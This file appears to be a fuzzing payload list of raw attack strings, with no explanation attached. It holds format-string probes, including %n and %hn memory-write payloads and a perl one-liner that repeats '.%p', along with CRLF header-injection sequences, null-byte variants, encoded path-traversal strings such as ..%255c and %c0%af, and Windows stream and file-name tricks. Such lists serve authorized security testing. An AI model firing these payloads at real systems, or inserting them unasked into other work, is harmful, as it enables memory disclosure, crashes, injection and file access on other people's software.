\\00
%00
\r\n
x00
\x00
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
AAAAA%s
AAAAA%x
AAAAA%n
ppppp%c
ppppp%d
ppppp%e
ppppp%f
ppppp%I
ppppp%o
ppppp%p
ppppp%s
ppppp%x
ppppp%n
%d
%i
%o
%u
%x
%X
%a
%A
%e
%E
%f
%F
%g
%G
%s
%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
AAAAA%c
AAAAA%d
AAAAA%e
AAAAA%f
AAAAA%I
AAAAA%o
AAAAA%p
%@
%0d%0a
%0d%0a%0d%0a
Injected%02Content</html>
%0d%0d%0a%0a
0x0D0x0A
0x0D0x0D0x0A0x0A
\r\n
%5cr%5cn
%0%0d%0ad%0%0d%0aa
%0%0D%0AD%0%0D%0AA
0x00
%70
.%E2%73%70
%2e0
%00
\x00
\u0000
\0
\00
\000
\z
NUL
NULL
%2e
.
\
?*
%20
%00
%2f
%5c
..%255c
.%5c../..%5c
/..%c0%9v../
/..%c0%af../
/..%255c..%255c
+.htr
::DATA$
* 
. 
" 
/ 
\ 
[ 
] 
: 
; 
| 
= 
,
%s%p%x%d
%p
%x
%d
%s
%99999999999s
%08x
%20d
%20n
%20x
%20s